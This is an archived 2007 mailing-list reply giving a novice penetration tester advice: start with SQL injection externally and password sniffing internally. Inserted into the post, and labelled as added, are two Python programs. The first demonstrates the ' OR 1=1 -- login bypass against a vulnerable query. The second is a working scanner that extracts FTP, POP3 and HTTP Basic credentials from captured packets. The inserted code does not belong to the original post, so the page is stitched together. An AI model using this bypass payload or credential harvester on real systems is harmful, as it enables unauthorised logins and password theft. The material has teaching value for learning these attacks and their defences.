Re: Most Successful Exploits/Tools to use against windows & Linux?

From: Derek Fountain (derekfountain@yahoo.co.uk)
Date: Sat May 26 2007 - 06:40:27 EDT


Pen Testee wrote:
> I am just getting started with Pen Testing and there is soooo much information available.
> I am trying to get the most bang for my time spent in getting up to speed.
> What are the best exploits to start with so that I am likely to have the most success.
> I am looking for suggestions from both within a network and from an external test...please label internal or external when providing your response.
>
> What are the best links that list tools to use against exploits, or exploits to try and the tools to use.

When you're starting out, you don't need tools. That's the way to
becoming a script kiddie. What you need is understanding. You need to
learn how systems work, what mistakes their administrators/programmers
make that make them vulnerable, and how those mistakes are exploited in
order to crack the box. Once you understand what you're doing, you'll be
able to choose the right tool for the right circumstances. Once you've
chosen the tool, it'll just make your process more efficient.

OK, lecture over, here's my answer. :o) Note it's /my/ answer - it's
rather subjective.

For external servers, start with SQL injection. It's easy to do and easy
to understand. It's also remarkable how many programmers make the
mistake of putting user input directly into their database queries. This
makes it an attack vector with a high chance of success.

For internal attacks you should be looking at network sniffing. Despite
the increased use of SSL-based protocols, there are still loads of
legacy applications in use that send passwords in plain text over
internal networks. You only need to spot one password and chances are
it'll let you into all sorts of accounts. So you'll want to get a book
on TCP/IP and learn to use something like Wireshark to pull passwords
off the wires.
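The SQL injection mistake Derek describes (user input concatenated straight into the query text), shown as an added example that is not part of the original post. It is written against an in-memory SQLite table with constructed sample rows; the login functions, the probe and the payload are illustrative assumptions, not code from any product or from the list archive. It pairs the vulnerable lookup with the parameterised version and runs the classic first test (a lone quote) against both:

```python
import sqlite3


def make_db():
    """In-memory users table with constructed sample rows (not from the original post)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """The mistake the post describes: user input pasted straight into the SQL text."""
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same lookup with bound parameters: the input is data, never part of the SQL."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def probe_for_injection(login, conn):
    """Classic first test: does a lone quote change how the query parses?

    A database error here means the quote reached the SQL parser, i.e. the
    input is being treated as code rather than as a value.
    """
    try:
        login(conn, "'", "x")
        return False
    except sqlite3.OperationalError:
        return True


def run_demo():
    """Run probe and bypass payload against both versions; returns the outcomes."""
    conn = make_db()
    # Hypothetical attacker input: closes the string, makes the WHERE always true,
    # and comments out the password check that follows.
    payload = "' OR 1=1 --"
    return {
        "quote_breaks_vulnerable": probe_for_injection(login_vulnerable, conn),
        "quote_breaks_safe": probe_for_injection(login_safe, conn),
        "vulnerable_bypass": login_vulnerable(conn, payload, "wrong"),
        "safe_bypass": login_safe(conn, payload, "wrong"),
        "safe_legit": login_safe(conn, "bob", "hunter2"),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name}: {result!r}")
```

The vulnerable version logs the attacker in as the first row in the table without knowing any password, and the single-quote probe throws a syntax error, which is exactly the signal you look for by hand before reaching for any tool. The parameterised version returns nothing for the payload and still works for a real login.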

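The internal-network sniffing Derek recommends, as an added example rather than anything from the original post: a small TCP payload scanner that does what you would otherwise do by eye in Wireshark, pulling cleartext FTP and POP3 USER/PASS pairs and HTTP Basic credentials out of IPv4/TCP packets. The packets are constructed inline (addresses, ports and credentials are made up for the demonstration), the packet builder and parser are this example's own minimal versions with checksums left at zero, and a TLS packet on 443 is included to show that passive sniffing recovers nothing from an encrypted session:

```python
import base64
import re
import socket
import struct


def build_ipv4_tcp(src, dst, sport, dport, payload):
    """Construct a minimal IPv4/TCP packet (checksums left zero; sample data only)."""
    # TCP header: sport, dport, seq, ack, data offset (5 words), flags PSH|ACK, window, csum, urg
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    # IPv4 header: ver/IHL, TOS, total length, id, flags/frag, TTL, proto=6 (TCP), csum, src, dst
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp + payload


def parse_ipv4_tcp(pkt):
    """Return (src, dst, sport, dport, payload) for an IPv4/TCP packet, else None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4 or pkt[9] != 6:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    src, dst = socket.inet_ntoa(pkt[12:16]), socket.inet_ntoa(pkt[16:20])
    tcp = pkt[ihl:]
    if len(tcp) < 20:
        return None
    sport, dport = struct.unpack("!HH", tcp[:4])
    data_off = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[data_off:]


# Legacy protocols that still send the login in the clear, keyed by server port
CLEARTEXT_LOGIN_PORTS = {21: "FTP", 110: "POP3"}


def extract_credentials(packets):
    """Scan packets for cleartext logins; returns (proto, src, dst, user, password) tuples."""
    found = []
    pending_user = {}  # (src, sport, dst, dport) -> username seen, awaiting PASS
    for pkt in packets:
        parsed = parse_ipv4_tcp(pkt)
        if parsed is None:
            continue
        src, dst, sport, dport, payload = parsed
        flow = (src, sport, dst, dport)
        if dport in CLEARTEXT_LOGIN_PORTS:
            # USER and PASS arrive in separate packets, so remember the username per flow
            m = re.match(rb"(USER|PASS) (.*?)\r\n", payload)
            if m:
                cmd, arg = m.group(1), m.group(2).decode("ascii", "replace")
                if cmd == b"USER":
                    pending_user[flow] = arg
                elif flow in pending_user:
                    found.append((CLEARTEXT_LOGIN_PORTS[dport], src, dst,
                                  pending_user.pop(flow), arg))
        elif dport == 80:
            # HTTP Basic auth is only base64, not encryption
            m = re.search(rb"Authorization: Basic ([A-Za-z0-9+/=]+)", payload)
            if m:
                decoded = base64.b64decode(m.group(1)).decode("ascii", "replace")
                user, _, pw = decoded.partition(":")
                found.append(("HTTP-Basic", src, dst, user, pw))
    return found


def sample_capture():
    """Constructed packets standing in for what Wireshark would show on an internal LAN."""
    c, ftp, web, pop, tls = "10.0.0.5", "10.0.0.21", "10.0.0.80", "10.0.0.110", "10.0.0.143"
    return [
        build_ipv4_tcp(c, ftp, 40001, 21, b"USER alice\r\n"),
        build_ipv4_tcp(c, ftp, 40001, 21, b"PASS s3cret\r\n"),
        build_ipv4_tcp(c, web, 40002, 80,
                       b"GET /intranet/ HTTP/1.1\r\nHost: web\r\n"
                       b"Authorization: Basic " + base64.b64encode(b"bob:hunter2") + b"\r\n\r\n"),
        build_ipv4_tcp(c, pop, 40003, 110, b"USER carol\r\n"),
        build_ipv4_tcp(c, pop, 40003, 110, b"PASS letmein\r\n"),
        # TLS on 443: ciphertext, nothing recoverable by passive sniffing
        build_ipv4_tcp(c, tls, 40004, 443, b"\x16\x03\x01\x00\x05\x01\x00\x00\x01\x00"),
    ]


if __name__ == "__main__":
    for proto, src, dst, user, pw in extract_credentials(sample_capture()):
        print(f"{proto}: {src} -> {dst}  {user}:{pw}")
```

On a real capture you would feed the scanner the raw IP packets from a pcap rather than the constructed list, but the logic is the same: match the login exchange of each cleartext protocol and keep per-flow state, because the username and password rarely arrive in the same segment. Note that Basic auth shows up here too; base64 is encoding, not protection, so an HTTP login without TLS is as exposed as FTP.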



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:50 EDT